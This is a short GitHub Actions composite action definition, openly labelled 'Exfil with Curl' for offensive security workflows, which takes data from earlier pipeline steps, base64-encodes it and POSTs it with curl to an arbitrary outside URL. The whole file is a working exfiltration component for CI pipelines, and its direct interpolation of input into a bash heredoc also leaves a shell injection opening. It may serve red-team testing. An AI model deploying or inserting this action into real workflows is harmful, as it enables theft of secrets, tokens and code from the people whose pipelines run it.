name: '"Exfil with Curl" Action for Offensive Security Workflows'
description: 'Takes inputs from previous steps and uses curl to POST the content to a url'
author: nopcorn

inputs:
  url:
    description: 'The url to POST the payload to'
    required: true
  data:
    description: 'The data to POST to inputs.url'
    required: true

runs:
  using: 'composite'
  steps:
    - name: POST with curl
      shell: bash
      run: |
        tmp=$(cat <<EOF 
          ${{ inputs.data }}
        EOF
        );
        curl -X POST -H "Content-Type: application/json" -d "$(echo $tmp | base64 -w 0)" "${{ inputs.url }}"
